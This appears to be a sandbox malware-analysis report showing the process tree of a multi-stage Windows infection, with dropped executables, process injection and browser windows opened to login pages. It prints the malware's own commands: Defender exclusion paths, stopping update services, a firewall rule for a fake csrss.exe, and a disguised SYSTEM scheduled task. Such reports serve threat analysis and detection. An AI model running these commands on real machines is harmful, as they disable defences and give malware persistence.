        Suspicious use of WriteProcessMemory
        
        PID:1968
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa20ac46f8,0x7ffa20ac4708,0x7ffa20ac4718
        8⤵
        
        PID:2204
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,2092121540541211755,9784906968469683847,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5328
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,2092121540541211755,9784906968469683847,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        8⤵
        
        PID:5308
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4888
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffa20ac46f8,0x7ffa20ac4708,0x7ffa20ac4718
        8⤵
        
        PID:3572
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,14815909909040061075,14374329080057543448,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6308
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2252
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x78,0x16c,0x7ffa20ac46f8,0x7ffa20ac4708,0x7ffa20ac4718
        8⤵
        
        PID:2240
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,3213718716720097612,6965629556684771409,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6356
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4456
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa20ac46f8,0x7ffa20ac4708,0x7ffa20ac4718
        8⤵
        
        PID:4552
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,7039395845270577849,4634612224449667056,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6348
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3660
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa20ac46f8,0x7ffa20ac4708,0x7ffa20ac4718
        8⤵
        
        PID:3328
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        7⤵
        
        PID:5364
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x40,0x16c,0x7ffa20ac46f8,0x7ffa20ac4708,0x7ffa20ac4718
        8⤵
        
        PID:6244
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Ea8934.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Ea8934.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6360
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:6128
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 540
        8⤵
        Program crash
        
        PID:5752
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7AJ62YN.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7AJ62YN.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:5592
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8eJ829Hk.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8eJ829Hk.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:3720
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:6104
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9jY6li4.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9jY6li4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4516
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:4996
- C:\Users\Admin\AppData\Local\Temp\2E8D.exe
  C:\Users\Admin\AppData\Local\Temp\2E8D.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5460
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4608
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa20ac46f8,0x7ffa20ac4708,0x7ffa20ac4718
      4⤵
      PID:6432
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,1354673633531504670,15855176337155975590,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
      4⤵
      PID:5348
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,1354673633531504670,15855176337155975590,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
      4⤵
      PID:4744
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,1354673633531504670,15855176337155975590,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
      4⤵
      PID:672
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,1354673633531504670,15855176337155975590,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
      4⤵
      PID:4344
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,1354673633531504670,15855176337155975590,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
      4⤵
      PID:6276
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,1354673633531504670,15855176337155975590,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1
      4⤵
      PID:6812
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,1354673633531504670,15855176337155975590,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
      4⤵
      PID:6268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,1354673633531504670,15855176337155975590,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
      4⤵
      PID:6896
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,1354673633531504670,15855176337155975590,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
      4⤵
      PID:6880
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,1354673633531504670,15855176337155975590,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
      4⤵
      PID:6676
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,1354673633531504670,15855176337155975590,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:8
      4⤵
      PID:1484
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,1354673633531504670,15855176337155975590,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:8
      4⤵
      PID:5020
- C:\Users\Admin\AppData\Local\Temp\59E4.exe
  C:\Users\Admin\AppData\Local\Temp\59E4.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3388
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
    3⤵
    - Executes dropped EXE
    PID:4708
  - - C:\Users\Admin\AppData\Local\Temp\Broom.exe
      C:\Users\Admin\AppData\Local\Temp\Broom.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4636
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:6804
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:2408
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    PID:332
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5580
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Executes dropped EXE
      Checks for VirtualBox DLLs, possible anti-VM trick
      Modifies data under HKEY_USERS
      PID:6624
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2772
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:1356
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:2180
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Modifies data under HKEY_USERS
        
        PID:5384
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5772
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:6796
- - C:\Users\Admin\AppData\Local\Temp\forc.exe
    "C:\Users\Admin\AppData\Local\Temp\forc.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    PID:5604
- C:\Users\Admin\AppData\Local\Temp\6D3E.exe
  C:\Users\Admin\AppData\Local\Temp\6D3E.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:6924
- - C:\Users\Admin\AppData\Local\Temp\6D3E.exe
    C:\Users\Admin\AppData\Local\Temp\6D3E.exe
    3⤵
    - Executes dropped EXE
    PID:5448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:7068
- C:\Users\Admin\AppData\Local\Temp\D724.exe
  C:\Users\Admin\AppData\Local\Temp\D724.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:6820
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
    3⤵
    PID:3964
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1428
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:6268
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:7048
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:6512
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1756
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:6068
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5996
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5068
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5868
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2440
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4504
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1680
- C:\Users\Admin\AppData\Local\Temp\6E74.exe
  C:\Users\Admin\AppData\Local\Temp\6E74.exe
  2⤵
  - Executes dropped EXE
  PID:5992
- C:\Users\Admin\AppData\Local\Temp\AB4F.exe
  C:\Users\Admin\AppData\Local\Temp\AB4F.exe
  2⤵
  - Executes dropped EXE
  PID:6852
- C:\Users\Admin\AppData\Local\Temp\B080.exe
  C:\Users\Admin\AppData\Local\Temp\B080.exe
  2⤵
  - Executes dropped EXE
  PID:5688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Modifies data under HKEY_USERS
  PID:5920
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:6368
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3112
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5416
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5288
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3104
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:6652
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:6972
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:3480
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:5664
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4184
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:6268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa20ac46f8,0x7ffa20ac4708,0x7ffa20ac4718
1⤵
PID:5112

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7004

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6128 -ip 6128
1⤵
PID:6668

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:3692

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3300

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1680

C:\Users\Admin\AppData\Local\CanReuseTransform\eiziu\_NewEnum.exe
C:\Users\Admin\AppData\Local\CanReuseTransform\eiziu\_NewEnum.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2548
